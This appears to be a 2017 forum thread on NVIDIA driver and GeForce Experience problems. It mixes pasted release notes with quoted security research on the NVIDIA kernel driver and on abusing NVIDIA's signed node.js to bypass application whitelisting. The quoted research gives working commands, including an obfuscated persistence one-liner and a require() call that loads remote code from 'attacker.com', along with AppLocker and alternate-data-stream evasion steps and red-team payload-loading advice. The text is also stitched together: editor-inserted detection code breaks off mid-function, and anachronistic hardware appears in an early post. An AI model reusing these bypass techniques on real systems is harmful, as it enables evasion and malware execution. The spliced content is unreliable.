Having this bug with RESIDENT EVIL 7 when recording with GFE 1080p@60FPS @20mbps.
SPOILERS!
Screen freezes after a few secs, frozen images, sometimes the video continues depending on where the timer is at, but then NO SOUND.
I tried uninstalling drivers + GFE and reinstalling, to NO LUCK.
ASUS X570 TUF GAMING PLUS, 32GB DDR4@2666 ,RYZEN 5800X3D (NO OC),GIGABYTE RTX 4070 Super GAMING OC, Western Digital Blue 4TB 5400RPM + SAMSUNG 860 EVO 500+1TB GB SSDs , OEM SATA DVD 22xNoctua NH-D15 Chromax Black, BenQ XL2420T Case: Be Quiet! DARK BASE PRO 901. PSU CORSAIR RM1200 SHIFT
@DV2 let me guess, you're using that Java crap 3.0 GFE version ... or there's the new, even more shit chromium GFE 3.4.xxx BETA with Alt+Z Share mode ...
all of which need constant net access.
The last good working GFE was v2.8.1.21, totally offline, works with the -shadowplay command for offline capture and menu ... and you can update your version if you need new features by manually copying its dll files (for the useless share menu, which you don't need).
it works as it should, captures all ... no hiccups.
... all GFE after that are shit ...
Really? So a fresh install of drivers ONLY, then install that older GFE and good to go? Is it still used via a front end for key assignments etc.?
Just install all your Nvidia drivers in Advanced mode with GFE ticked off (Nvidia drivers uninstall all GFE by default if you pick this option ... or you can delete the stub in the drivers) ... then install this v2.8.1.21
and then add to your desktop a shortcut with -shadowplay (example: "C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\GFExperience.exe" -shadowplay), this will open shadowplay in offline mode ... if you need the features of new GFE you have to copy manually all the new DLLs from the new drivers (I have checked all of those and they did not change a thing ... all they now add is Shield streaming support and the Share menu when you press ALT+Z)
and yes, you will still have a front end, but you have to open it with that prepared shortcut.
You're right, their GUI is awful ... but you can also use Dxtory and with it hijack the Nvidia capture ... making Dxtory the GUI and capturing the screen using the Nvidia stream server drivers that Shadowplay uses.
Game Ready
Provides the optimal gaming experience for Sniper Elite 4, For Honor, and Halo Wars 2.
New Features
Video SDK 8.0
- High-bit-depth (10/12-bit) decoding (VP9/HEVC)
- OpenGL input surface support for encoder
- Weighted Prediction
- H.264 ME-only mode enhancements
Application SLI Profiles
No SLI profiles were added with this version.
Changes and Fixed Issues in Version 378.66
[Surround]: Surround cannot be enabled on the XGPU. [200236703]
[G-Sync]: With G-Sync and V-Sync both enabled, there is a long delay when switching a game from full-screen mode to windowed mode.[1867557]
[Second Life 64-bit]: World view is tinted blue after disabling Advanced Lighting Model. [200274562]
[The Division]: Shadows flicker after enabling PCSS. [1867573]
[Kepler GPUs][Battlefield 1]: There is flickering in the game when using TAA. [1865681]
[SLI][Battlefield Day28 Patch]: The menu text becomes jittery when SLI is enabled. [1837721]
[SLI][Surround][GeForce GTX 1080]: The system crashes when launching games in SLI Surround using HDMI 2.0 connections. [1834142]
[GeForce GTX 1080][Heroes of Storm]: The game crashes when launched. [200274793]
[GeForce 860M][Notebook]: Direct X games crash. [1868454]
[Minecraft]: Java SE Binary crashes pointing to nvinitx.dll. [200274582]
[GeForce GTX 980 Ti]: The driver is unable to detect multiple TV models. [1788948]
Open Issues in Version 378.66 WHQL
Windows 10 Issues
[Pascal][Notebook]: The display remains blank while over installing the driver, requiring a reboot. [200273603]
[GeForce GTX 980][CUDA]: Driver error occurs when trying to compute with GPUGrid CUDA application.[1869402]
[Surround][DirectX 11 apps] Only red and blue colors are visible when playing videos at resolutions >= 1080P on one surround monitor.[200273552]
[GM204, Tom Clancy's The Division Survival DLC] Game crashes pointing to ntdll.dll when changed to full-screen and to windowed full-screen. [200252894]
[GM204, ShadowPlay] For Honor silently crashes if intro video is skipped and instant replay is on. [200247313]
[SLI] [GeForce GTX 970M] Level loading hangs in Gears of War 4. [1826307]
[347.09, GM204] Blank screen observed on an ASUS Tiled display when system resumes from shutdown or hibernation with Fast boot option enabled from BIOS. [1591053]
Windows 8.1/Windows 8 Issues
[3DVision] While a stereoscopic 3D video with stereoscopic 3D enabled is played, the monitor refresh rate switches to 60 Hz after changing the resolution using the Windows control panel. [1314811]
[Video, Notebook] The NVIDIA Control Panel video color settings have no effect on YouTube flash video playback within Internet Explorer 10. [999485]
Windows 7 Issues
[GeForce GTX 1080] Battlefield 1 hangs when campaign loaded with Fast Sync enabled from the NVIDIA Control Panel. [200254350]
[SLI] Street Fighter V performance drop (pause and play) observed when the game is played at 4K resolution with SLI enabled. [200172046]
[3DVision] While a stereoscopic 3D video with stereoscopic 3D enabled is played, the monitor refresh rate switches to 60 Hz after changing the resolution using the Windows control panel. [1314811]
(In regards to SLI the earlier 378.xx drivers already added a SLI profile for Sniper Elite V4 for DX11)
Just installed the new "378.66" drivers. I had to uninstall the prior ones due to blue screening. Hopefully they fixed what was ever broken in prior ones and these work. We shall see.
News and updates from the Project Zero team at Google
Tuesday, February 14, 2017
Attacking the Windows NVIDIA Driver
Posted by Oliver Chang
Modern graphic drivers are complicated and provide a large promising attack surface for EoPs and sandbox escapes from processes that have access to the GPU (e.g. the Chrome GPU process). In this blog post we’ll take a look at attacking the NVIDIA kernel mode Windows drivers, and a few of the bugs that I found. I did this research as part of a 20% project with Project Zero, during which a total of 16 vulnerabilities were discovered...
Kernel WDDM interfaces
The kernel mode component of a graphics driver is referred to as the display miniport driver. Microsoft’s documentation has a nice diagram that summarises the relationship between the various components:
In the DriverEntry() for display miniport drivers, a DRIVER_INITIALIZATION_DATA structure is populated with callbacks to the vendor implementations of functions that actually interact with the hardware, which is passed to dxgkrnl.sys (DirectX subsystem) via DxgkInitialize(). These callbacks can either be called by the DirectX kernel subsystem, or in some cases get called directly from user mode code.
DxgkDdiEscape
A well known entry point for potential vulnerabilities here is the DxgkDdiEscape interface. This can be called straight from user mode, and accepts arbitrary data that is parsed and handled in a vendor specific way (essentially an IOCTL). For the rest of this post, we’ll use the term “escape” to denote a particular command that’s supported by the DxgkDdiEscape function.
NVIDIA has a whopping 400~ escapes here at time of writing, so this was where I spent most of my time (the necessity of many of these being in the kernel is questionable):
// (names of these structs are made up by me)
// DWORD comes from the Windows SDK; _QWORD is IDA's name for a 64-bit unsigned
// integer. The include, typedef and forward declaration are added here so the
// fragment compiles; the NvEscapeRecordInfo layout is not shown in the post.
#include <windows.h>
typedef unsigned long long _QWORD;
struct NvEscapeRecordInfo;
// Represents a group of escape codes
struct NvEscapeRecord {
DWORD action_num;       // escape action number selected by the caller
DWORD expected_magic;   // magic value the request must carry
void *handler_func;     // vendor handler invoked for this escape
NvEscapeRecordInfo *info;
_QWORD num_codes;       // number of escape codes in this group
};
...
Quote:
Conclusion
Given the large attack surface exposed by graphics drivers in the kernel and the generally lower quality of third party code, it appears to be a very rich target for finding sandbox escapes and EoP vulnerabilities. GPU vendors should try to limit this by moving as much attack surface as they can out of the kernel.
Hey, I think I've found the solution to the above YT bugs when uploading..
TL;DR. Uploading/processing of vids to YT via FIREFOX. Freezes when uploading a 6min vid, for a nearly 2h upload in the end. Vid ends up being frozen and buggy OMGWTFBBQ (Hey, long time not seeing that!)
Solution: Temporary jump to Google Chrome, login there and upload the stuff. Checking the process of a 6min vid took 6mins to upload and 6mins to process.. The vids work CORRECTLY LATER ON BOTH FIREFOX AND GCHROME
Issue then? Firefox and YT. NOT GFE's FAULT!
There, I'm done *Drops the mic*
- Fixed driver installation errors for laptops with GeForce GTX 1050 and 1050 ti GPUs.
- Fixed crash in Minecraft and some other Java-based titles
- Resolved 'Debug Mode' as default option on Pascal based GPUs
Related (sort of) after the recent announcements, take it with a grain of green salt
Quote:
NVIDIA also revealed an upcoming Game Ready Driver optimized for DirectX 12 games.
The company refined code in the driver and worked side by side with game developers to deliver performance increases of up to 16 percent on average across a variety of DirectX 12 games, such as Ashes of the Singularity, Gears of War 4, Hitman, Rise of the Tomb Raider and Tom Clancy's The Division.
EDIT:
Game Ready - Ghost Recon: Wildlands
Gaming Technology - DX12 optimizations
New Features - 1080Ti support.
SLI Profiles - Deus Ex: Mankind Divided, Titanfall 2, Tom Clancy's The Division
Quote:
Changes and Fixed Issues in Version 378.78
The following sections list the important changes and the most common issues resolved in this version. This list is only a subset of the total number of changes made in this driver version. The NVIDIA bug number is provided for reference.
[Discord]: The GFE FPS counter appears in the application. [200281089]
[GeForce 1050 Ti][Notebook]: Blue-screen crash occurs on some notebook platforms. [1877803]
[GeForce GTX 980 Ti][PhysX]: PhysX uses the CPU when Optimize for Compute Performance setting is OFF, resulting in a drop in performance. [1871405]
[GeForce GTX 980][CUDA]: Driver error occurs when trying to compute with GPUGrid CUDA application.[1869402]
[GeForce GTX 980 Ti][OpenCL]: Driver error occurs when trying to compute PrimeGrid Genefer OpenCL tool. [1867576]
[GeForce Experience]: Driver installation fails when attempting to perform a driver overinstall. To workaround, perform a clean installation.
[GeForce GTX 1080 Ti][Sid Meier's Civilization VI][G-Sync/SLI/DirectX 12]: Black corruption appears while entering the in-game menu after skipping the cutscene. [200283322]
[GeForce GTX Titan X][Ansel][Ghost Recon Wildlands]: With FXAA enabled from the NVIDIA Control Panel, the application crashes when enabling the in-game Ansel UI. [200283194]
Error code 43 appears in the Device Manager after installing the driver with HDMI display connected. [200283276]
[Pascal][Notebook]: The display remains blank while over installing the driver, requiring a reboot. [200273603]
[GM204, Tom Clancy's The Division Survival DLC] Game crashes pointing to ntdll.dll when changed to full-screen and to windowed full-screen. [200252894]
[GM204, ShadowPlay] For Honor silently crashes if intro video is skipped and instant replay is on. [200247313]
[SLI] [GeForce GTX 970M] Level loading hangs in Gears of War 4. [1826307]
[347.09, GM204] Blank screen observed on an ASUS Tiled display when system resumes from shutdown or hibernation with Fast boot option enabled from BIOS. [1591053]
Windows 8.1/Windows 8 Issues
[3DVision] While a stereoscopic 3D video with stereoscopic 3D enabled is played, the monitor refresh rate switches to 60 Hz after changing the resolution using the Windows control panel. [1314811]
[Video, Notebook] The NVIDIA Control Panel video color settings have no effect on YouTube flash video playback within Internet Explorer 10. [999485]
Windows 7 Issues
[GeForce GTX 1080] Battlefield 1 hangs when campaign loaded with Fast Sync enabled from the NVIDIA Control Panel. [200254350]
[SLI] Street Fighter V performance drop (pause and play) observed when the game is played at 4K resolution with SLI enabled. [200172046]
[3DVision] While a stereoscopic 3D video with stereoscopic 3D enabled is played, the monitor refresh rate switches to 60 Hz after changing the resolution using the Windows control panel. [1314811]
Game Ready
Provides the optimal gaming experience for Mass Effect: Andromeda and Rock Band VR.
New Features
Added support for Dolby Vision for games.
Application SLI Profiles
Added or updated the following SLI profiles:
Dead Rising 4 - updated
Deus Ex: Breach - updated
Mass Effect: Andromeda - added SLI profile
3D Vision Profiles
Added or updated the following 3DV profiles:
Halo Wars 2 - Not recommended
3D Compatibility Mode Profiles
These games must be run in DirectX 10/11 mode to see improvements and are not compatible with 3D Vision Surround mode. See “3D Compatibility Mode” on page 11 for more information.
Added or updated the following compatibility mode profiles:
Dreadnought - Excellent
Quote:
Open Issues in Version 378.92 WHQL
As with every released driver, version 378.92 WHQL of the Release 378 driver has open issues and enhancement requests associated with it.
This section includes lists of issues that are either not fixed or not implemented in this version. Some problems listed may not have been thoroughly investigated and, in fact, may not be NVIDIA issues. Others may have workaround solutions.
Windows 10 Issues
[GeForce Experience]: Driver installation fails when attempting to perform a driver overinstall. To workaround, perform a clean installation.
[SLI][GeForce GTX 1080][Battlefield 1 XP1]: With SLI enabled, corruption appears in the game when switching between full-screen and windowed mode. [1889162]
[GeForce GTX 1080 Ti][Mass Effect: Andromeda]: Random memory errors occur when playing the game. [1887520]
[GeForce GTX 1080 Ti][Sid Meier's Civilization VI][G-Sync/SLI/DirectX 12]: Black corruption appears while entering the in-game menu after skipping the cutscene. [200283322]
[GeForce GTX Titan X][Ansel][Ghost Recon Wildlands]: With FXAA enabled from the NVIDIA Control Panel, the application crashes when enabling the in-game Ansel UI. [200283194]
Error code 43 appears in the Device Manager after installing the driver with HDMI display connected. [200283276]
[Pascal][Notebook]: The display remains blank while over installing the driver, requiring a reboot. [200273603]
[GM204, Tom Clancy's The Division Survival DLC] Game crashes pointing to ntdll.dll when changed to full-screen and to windowed full-screen. [200252894]
[GM204, ShadowPlay] For Honor silently crashes if intro video is skipped and instant replay is on. [200247313]
[SLI] [GeForce GTX 970M] Level loading hangs in Gears of War 4. [1826307]
[347.09, GM204] Blank screen observed on an ASUS Tiled display when system resumes from shutdown or hibernation with Fast boot option enabled from BIOS. [1591053]
Windows 8.1/Windows 8 Issues
[3DVision] While a stereoscopic 3D video with stereoscopic 3D enabled is played, the monitor refresh rate switches to 60 Hz after changing the resolution using the Windows control panel. [1314811]
[Video, Notebook] The NVIDIA Control Panel video color settings have no effect on YouTube flash video playback within Internet Explorer 10. [999485]
Windows 7 Issues
[GeForce GTX 1080] Battlefield 1 hangs when campaign loaded with Fast Sync enabled from the NVIDIA Control Panel. [200254350]
[SLI] Street Fighter V performance drop (pause and play) observed when the game is played at 4K resolution with SLI enabled. [200172046]
[3DVision] While a stereoscopic 3D video with stereoscopic 3D enabled is played, the monitor refresh rate switches to 60 Hz after changing the resolution using the Windows control panel. [1314811]
This is a message I sent to Nvidia related to their 3.4 version of GFE. Actually using 3.3 with autoupdate disabled (now their official site shows 3.4 for DL and i-don't-want-that...)
--
"After a fresh format/install of Windows 7, I went and DL'd the newest Nvidia drivers from today (or whenever). Installed everything, even GFE 3.4, except the 2 3D Vision options.
Whenever I reboot the PC and go to GFE, I go to the Settings icon at the top right and I see that "Share" is already on!... However if I press "Configuration" ... It does NOTHING... Only the flashy FX.
I turn off Share, but when I try to re-open it it says "an error has been produced. Try rebooting your system" or something. So I do!.... AND THE PROBLEM PERSISTS!..
Aka I CAN'T RECORD ANYTHING!!
Any solution, please?...
And yes, I've uninstalled all the Nvidia stuff, rebooted every time when asked, then reinstalled with the GFE checked. Same issue. Don't want to get the previous version since, I think, because of that it made W7 load 1-2 minutes ON AN SSD since POST!
What I meant is that I had 3.3 and whenever it wanted to update to 3.4 it threw me install errors, and once it finally got in, the W7 issues happened... And I don't want it to happen AGAIN, NOT AT ALL ><"
Game Ready - Quake Champions: Closed Beta
Product Support - Nvidia Titan Xp
Features:
Added support for Windows 10 Creators Update.
Added DTS X and Dolby Atmos support for 5.1.2 speaker configuration.
Added Dolby Vision support for games.
Added NVIDIA Ansel TM support for Snake Pass and Kona.
NVIDIA Control Panel
*Display page: Added the option to override the Windows 10 control of desktop color settings.
*Manage 3D Settings page: Added option to disable self-refresh power-saving feature for G-Sync.
Applies to self-refresh capable notebooks using Pascal-based GPUs with G-Sync enabled.
SLI profiles - Descent Underground (updated)
Changes and fixes
[XSplit][DirectX 12 games such as Rise of the Tomb Raider]: Games experience poor performance.[1882697]
[GeForce GTX TITAN X][SLI][Battlefield 1- XP1 Update]: Shimmering occurs on grass and trees with SLI and in-game TAA enabled. [200289721]
[GeForce GTX 1070][Serious Sam HD]: Heavy flickering occurs in the game with V-sync enabled. [1881405]
[GeForce GTX 980 Ti]: The GPU occasionally gets stuck in a low power state after pressing Alt-Tab while playing a game. [1832415]
Open issues Windows 10
[GeForce Experience]: Driver installation may fail when attempting to perform a driver overinstall. To workaround, perform a clean installation.
[SLI][GeForce GTX 1080][Battlefield 1 XP1]: With SLI enabled, corruption appears in the game when switching between full-screen and windowed mode. [1889162]
[GeForce GTX 1080 Ti][Mass Effect: Andromeda]: Random memory errors may occur when playing the game. [1887520]
[GeForce GTX 1080 Ti][Sid Meier's Civilization VI][G-Sync/SLI/DirectX 12]: Black corruption appears while entering the in-game menu after skipping the cutscene. [200283322]
[GM204] Quantum Break window either remains blank or freezes in game scene in windowed mode. [1804910]
Surround Display icon disappears after rotate mode is set to portrait. [200201040]
[SLI] Street Fighter V performance drop (pause and play) observed when the game is played at 4K resolution with SLI enabled. [200172046]
[347.09, GM204] Blank screen observed on an ASUS Tiled display when system resumes from shutdown or hibernation with Fast boot option enabled from BIOS. [1591053]
[GeForce GTX Titan X][Ansel][Ghost Recon Wildlands]: With FXAA enabled from the NVIDIA Control Panel, the application crashes when enabling the in-game Ansel UI. [200283194]
Error code 43 appears in the Device Manager after installing the driver with HDMI display connected. [200283276]
[Pascal][Notebook]: The display remains blank while over installing the driver, requiring a reboot. [200273603]
[GM204, Tom Clancy's The Division Survival DLC] Game crashes, pointing to ntdll.dll when changed to full-screen and to windowed full-screen. [200252894]
[GM204, ShadowPlay] For Honor silently may crash if the intro video is skipped while instant replay is on. [200247313]
[SLI] [GeForce GTX 970M] Level loading may hang in Gears of War 4. [1826307]
[367.77, WDDM 2.1] Driver install/overinstall requires a reboot. [1757931]
[SLI, GP104] Installer prompts for a reboot during express overinstall of 372.69 driver on 372.54. [200231806]
Windows 8.1 / Windows 8
[3DVision] While a stereoscopic 3D video with stereoscopic 3D enabled is played, the monitor refresh rate switches to 60 Hz after changing the resolution using the Windows control panel. [1314811]
[Video, Notebook] The NVIDIA Control Panel video color settings have no effect on YouTube flash video playback within Internet Explorer 10. [999485]
Windows 7
[GeForce GTX 1080] Battlefield 1 hangs when campaign loaded with Fast Sync enabled from the NVIDIA Control Panel. [200254350]
[SLI] Street Fighter V performance drop (pause and play) observed when the game is played at 4K resolution with SLI enabled. [200172046]
[3DVision] While a stereoscopic 3D video with stereoscopic 3D enabled is played, the monitor refresh rate switches to 60 Hz after changing the resolution using the Windows control panel. [1314811]
News from SEC Consult's experts and 0day research lab.
Thursday, April 20, 2017
Abusing NVIDIA's node.js to bypass application whitelisting
Application Whitelisting
Application whitelisting is an important security concept which can be found in many environments during penetration testing. The basic idea is to create a whitelist of allowed applications and after that only allow the execution of applications which can be found in that whitelist. This prevents the execution of dropped malware and therefore increases the overall security of the system and network.
A very commonly used solution for application whitelisting is Microsoft AppLocker. Another concept is to enforce code and script integrity via signatures. This can be achieved on Microsoft Windows 10 or Server 2016 with Microsoft Device Guard.
SEC Consult Vulnerability Lab has been doing research in this area for several years; bypass techniques were already presented in 2015 and 2016 at conferences such as CanSecWest, DeepSec, Hacktivity, BSides Vienna and IT-SeCX, see [1].
Knowing these bypass techniques is really important for administrators who maintain such protected environments because special rules must be applied to prevent these attacks.
Other good and recommended sources of known bypass techniques and hardening guides are blog posts from Casey Smith (subtee) [2], Matt Nelson (enigma0x3) [3] and Matt Graeber (mattifestation) [4].
NVIDIA's node.js
During a quick research in a different area, I came across a system which had NVIDIA drivers installed. The following executable gets installed by NVIDIA:
%ProgramFiles(x86)%\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe
This is a renamed version of node.js (but signed by NVIDIA Corporation) which can be verified via the meta data of the file:
That means we can find node.js on systems with NVIDIA drivers installed. Since this file is already on the system and it has a valid signature, it will be whitelisted by the application whitelisting solution.
Nowadays, the most common technique to bypass application whitelisting is to start PowerShell, because the target code can be passed inside arguments, it has full access to the Windows API, it is a signed binary from Microsoft and it can be found on all newer systems. However, it’s the first binary which gets removed from the whitelist by administrators, PowerShell v5 provides very good logging (attack detection and forensics), Device Guard UMCI (user mode code integrity) places PowerShell in Constrained Language mode and Antivirus solutions monitor malicious invocations of PowerShell.
Nearly the same advantages as with PowerShell can be achieved by abusing node.js from NVIDIA if the target system has these drivers installed. It can be started in interactive mode, which means that scripts can be passed via pipe (payloads are not written to disk). For example, the following command starts the calculator via node.js:
echo require('child_process').exec("calc.exe") | "%ProgramFiles(x86)%\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe" -i
From an attacker's perspective, this opens two possibilities: either use node.js to directly interact with the Windows API (e.g. to disable application whitelisting or reflectively load an executable into the node.js process to run the malicious binary on behalf of the signed process), or write the complete malware in node.js. Both options have the advantage that the running process is signed and therefore bypasses anti-virus systems (reputation-based algorithms) by default.
Writing malware completely in node.js has the great side-effect that NVIDIA already installs addons with useful functions such as:
However, to get the full power of the Windows API, we can write addons in C/C++ for node.js:
Node.js Addons are dynamically-linked shared objects, written in C or C++, that can be loaded into Node.js using the require() function, and used just as if they were an ordinary Node.js module. They are used primarily to provide an interface between JavaScript running in Node.js and C/C++ libraries. [5]
That means node.js has full access to the Microsoft Windows API and reflective DLL injection is possible.
To load such an Addon the path to the .node file must be passed to the require() function. Node files are normal PE files with some special exported functions, but it’s also possible to load any .dll file with one of the below code lines (an error will be thrown but DllMain gets executed):
A drawback of the reflective DLL injection attack is that it requires one file write, because as far as I know node.js doesn’t support execution of modules from memory (or direct access to the Windows API). It’s therefore required to drop one loader-module to disk, then load this module which acts as a wrapper for the Windows API. Using the dropped module, the script can then access the Windows API and reflectively load any executable / library into the signed node.js process (similar concept to Invoke-ReflectivePEInjection.ps1 from PowerSploit, see [6]).
Please note that the above approach drops one file to disk; however, this is only a legit node.js module. The real malware can afterwards be loaded via the loader-module from memory and is therefore never written to disk.
The file can be dropped to the following location which is writeable by standard users:
%systemdrive%\ProgramData\NVIDIA Corporation\Downloader\
Overcoming the “issue” of the one-file-write is not trivial. It’s not really a big problem (e.g. the dropped file is not malicious and will not be detected by an AntiVirus solution); however, it could block execution in some cases (e.g. DLL AppLocker rules). Such DLL rules can be bypassed in several ways depending on the used product and configuration. For example, it's possible to abuse AppLocker default rules which allow execution of all files in %windir%\*. Therefore, an attacker can drop his node module to the writeable tasks folder:
%windir%\Tasks\
There are many similar writeable locations inside the %windir% folder. Let's assume that an administrator denies all these writeable locations by adding exclude rules for them. Is the system now secure?
The answer is NO, because ADS (alternate data streams) can be abused. Since we can create a sub-folder in %windir%\tracing, we can create an ADS on the folder (for an explanation of ADS see Alex Inführ's blog post [7]). This can be used to bypass additional restrictions / monitoring rules. Let’s say we drop the following file:
%windir%\Tracing:module.node
All common APIs return %windir% as the base folder and not %windir%\tracing, which makes the module look like a file from the normal Windows folder (however, a normal user does not have write permissions to %windir%!).
This trick is already known and was described by James Forshaw on a different subject (unfortunately, I didn’t find his original post on it, but in general all his posts are highly recommended).
What does that mean? Even if an administrator added additional exclude rules to the default rules to block writeable folders, we can still bypass AppLocker with the ADS.
The following figure shows this (AppLocker is configured to prevent C:\Windows\tracing\* and several other writeable locations):
Here Microsoft's control.exe is used to load the library; however, it can also be loaded via node.js (and using the fs module it's possible to create the ADS).
Another possibility is to overwrite an existing library if application whitelisting was configured only based on paths (because of updates).
Here are some additional methods which I tried to avoid the file write altogether:
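To make the ADS point above concrete from the defender's side, here is an added example (editor-written, not SEC Consult's code) that models a simplified allow-list matcher with the rule shape the post describes: an allow rule for %windir%\* plus deny rules for the writable subfolders. It shows that a stream attached to the tracing folder is not caught by a deny rule written for that folder's contents, while a matcher that recognises the stream syntax refuses it. The rule set, the prefix-matching semantics and the sample paths are constructed assumptions; this is a model for reasoning about rules, not AppLocker's real engine.

```javascript
// Added example, not from the SEC Consult post: a simplified allow-list
// matcher that shows how an alternate data stream (ADS) attached to a folder
// evades a deny rule written for that folder, and how to flag ADS syntax.
// Rules, matching semantics and sample paths are constructed assumptions;
// this is a model, not AppLocker's actual rule engine.

const WINDIR = "C:\\Windows";

// Constructed rule set: an allow rule resembling the default for the Windows
// folder, plus deny rules for the writable subfolders named in the post.
const RULES = [
  { action: "deny", pattern: WINDIR + "\\tracing\\*" },
  { action: "deny", pattern: WINDIR + "\\Tasks\\*" },
  { action: "allow", pattern: WINDIR + "\\*" },
];

// Split "C:\Windows\Tracing:module.node" into base "C:\Windows\Tracing" and
// stream "module.node". The colon at index 1 belongs to the drive letter and
// is skipped; any later colon marks an ADS.
function splitAds(p) {
  const idx = p.indexOf(":", 2);
  if (idx === -1) return { base: p, stream: null };
  return { base: p.slice(0, idx), stream: p.slice(idx + 1) };
}

// Case-insensitive prefix match for "dir\*" style patterns.
function matchesPattern(path, pattern) {
  const prefix = pattern.slice(0, -1).toLowerCase(); // drop trailing "*"
  return path.toLowerCase().startsWith(prefix);
}

// Naive evaluation on the raw string: deny rules win, then allow rules,
// otherwise implicit deny. The deny prefix "C:\Windows\tracing\" never
// matches "C:\Windows\Tracing:module.node", so the broad allow rule applies.
function naiveDecision(path) {
  for (const r of RULES) {
    if (r.action === "deny" && matchesPattern(path, r.pattern)) return "deny";
  }
  for (const r of RULES) {
    if (r.action === "allow" && matchesPattern(path, r.pattern)) return "allow";
  }
  return "deny";
}

// Hardened evaluation: refuse any path carrying a stream name, then fall
// back to the naive rules for ordinary paths.
function hardenedDecision(path) {
  const { stream } = splitAds(path);
  if (stream !== null) return "deny-ads";
  return naiveDecision(path);
}

// Demonstration on constructed paths.
function demo() {
  const samples = [
    "C:\\Windows\\Tracing\\module.node", // ordinary file in the writable folder
    "C:\\Windows\\Tracing:module.node",  // ADS on the folder, as in the post
    "C:\\Windows\\notepad.exe",          // ordinary file under %windir%
    "C:\\Users\\bob\\module.node",       // outside the allow rule
  ];
  return samples.map(p => ({ path: p, naive: naiveDecision(p), hardened: hardenedDecision(p) }));
}

if (typeof require !== "undefined" && require.main === module) console.table(demo());
```

Running the file prints the four sample paths with both decisions: the plain file under tracing is denied by both matchers, the ADS path is allowed by the naive matcher and refused as "deny-ads" by the hardened one. The practical lesson is that path-based deny rules need a companion control that rejects or at least logs stream syntax, since a deny rule for a folder's contents says nothing about streams on the folder itself.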
Some methods which I tried for in-memory files
UNC paths:
require("\\\\attacker.com\\malicious.js")
The code first tries to load the addon via SMB (port 445) and uses WebDAV (port 80) as fall-back. Since outgoing SMB traffic is forbidden in most environments, it would be good to directly access the data via WebDAV (and it’s possible to create a WebDAV server in JavaScript with node.js, but then firewall problems can occur). This is possible via paths such as the following two:
A good explanation why these paths work can be found at [8].
However, both path formats are not allowed inside node.js (the code later calls lstat, which throws a file-not-found exception). Moreover, Microsoft internally writes the file to %localappdata%, making the approach useless for achieving file-less exploitation.
Another idea was to abuse named pipes which can be created with node.js code, however, named pipes are not seekable and therefore LoadLibrary() / require() fail.
Calling CreateFile with FILE_ATTRIBUTE_TEMPORARY and FILE_FLAG_DELETE_ON_CLOSE creates in most cases an in-memory file, however, node.js does not provide a way to pass these flags inside JavaScript code.
For people wondering why NVIDIA ships with node.js
At startup, NVIDIA starts a webserver via node.js (providing functionality like the above-mentioned webcam control) on a randomized port. To protect against attacks, a random secret cookie is created and must be passed to interact with the service. The information about the used port number and cookie value can be extracted from the following file:
For red teamers, it’s the recommended approach to use the fs module from node.js to write a loader addon to disk which gives access to the Microsoft Windows API from JavaScript code. Then JavaScript code can be used to download the (encrypted) payload from the internet and with the Windows API the JavaScript code can reflectively load the payload into its own process space and execute it.
Node.js itself can be started via one of the public known techniques (see our slides at [1]), for example .chm, .lnk, .js, .jse, Java applets, macros, from an exploited process, pass-the-hash and so on.
Standard obfuscation tricks can be used to further hide the invocation. For example, the following code starts calc.exe but tries to further hide:
echo "outdated settings;set colors=";c=['\162\145\161\165\151\162\145','\143\150\151\154\144\137\160\162\157\143\145\163\163','\145\170\145\143','\143\141\154\143'];global[c[0]](c[1])[c[2]](c[3]);"; set specialChars='/*&^"|;"%ProgramFiles(x86)%\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe" -i
Such code can be used as a persistence mechanism (auto start) because the called binary is signed by NVIDIA and will be considered safe. Of course, additional anti-monitoring tricks such as ^ or %programdata:~0,-20% can be used somewhere inside the above command line to further prevent detection; however, such code is in my opinion traitorous.
For security consultants, it's recommended to search for node.js binaries (file size > 10 MB and binary contains Node.js strings) during client security audits to identify other vendors which ship node.js to clients.
For blue teamers, it’s recommended to remove the file from the whitelist (if possible) or at least monitor its invocation.
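The two recommendations above (inventory bundled node.js binaries; monitor invocation of the NvNode web helper), as an added Python example that is not code from the original post or from NVIDIA. find_node_binaries() applies the post's size-plus-strings heuristic; flag_web_helper_launches() matches command lines from process-creation events or autorun entries after undoing the cmd.exe tricks the post mentions (caret insertion and %var:~start,len% substring expansion, which yields an empty string for %programdata:~0,-20%). Assumptions: the marker strings other than "Node.js", the script-host list, the node switches -i/-e/-p, and every sample file, record and environment value, all of which are constructed here.

```python
"""Added example (not the post's code): audit and detection helpers for the two
recommendations above.  find_node_binaries() applies the post's heuristic (files
above a size threshold containing Node.js strings); flag_web_helper_launches()
matches command lines against the NvNode web helper after undoing the cmd.exe
tricks the post mentions.  Sample files, records and the environment map are
constructed for this example."""
import os
import re
import tempfile

NODE_MARKERS = (b"Node.js", b"node_modules", b"process.binding")  # first from the post, rest assumed
DEFAULT_MIN_SIZE = 10 * 1024 * 1024  # the post's "> 10 MB" heuristic

def _markers_in_file(path, markers=NODE_MARKERS, chunk=1 << 20):
    """Stream the file, keeping an overlap so a marker split across two reads is seen."""
    overlap = max(len(m) for m in markers) - 1
    found, tail = set(), b""
    with open(path, "rb") as fh:
        for buf in iter(lambda: fh.read(chunk), b""):
            window = tail + buf
            found.update(m for m in markers if m in window)
            tail = window[-overlap:]
    return tuple(sorted(found))

def find_node_binaries(root, min_size=DEFAULT_MIN_SIZE):
    """Return (path, size, markers) for files under root above min_size that carry markers."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                size = os.path.getsize(path)
            except OSError:
                continue  # unreadable or vanished: skip it, do not abort the audit
            if size > min_size:
                markers = _markers_in_file(path)
                if markers:
                    findings.append((path, size, markers))
    return findings

# Constructed environment map (not read from the host) used for %VAR% expansion.
SAMPLE_ENV = {"programfiles(x86)": r"C:\Program Files (x86)", "programdata": r"C:\ProgramData"}
VAR_RE = re.compile(r"%([A-Za-z_][A-Za-z0-9_()]*)(?::~(-?\d+)(?:,(-?\d+))?)?%")

def normalize_cmdline(cmdline, env=SAMPLE_ENV):
    """Expand %VAR% / %VAR:~start,len% (cmd.exe substring semantics), then drop ^ escapes.
    %programdata:~0,-20% is "" for a 14-character value, so it can be sprinkled into a
    command line without changing what cmd.exe runs."""
    def sub(m):
        val = env.get(m.group(1).lower())
        if val is None:
            return m.group(0)  # unknown variable: leave it as written
        if m.group(2) is None:
            return val
        start = int(m.group(2))
        if m.group(3) is None:
            return val[start:]
        length = int(m.group(3))
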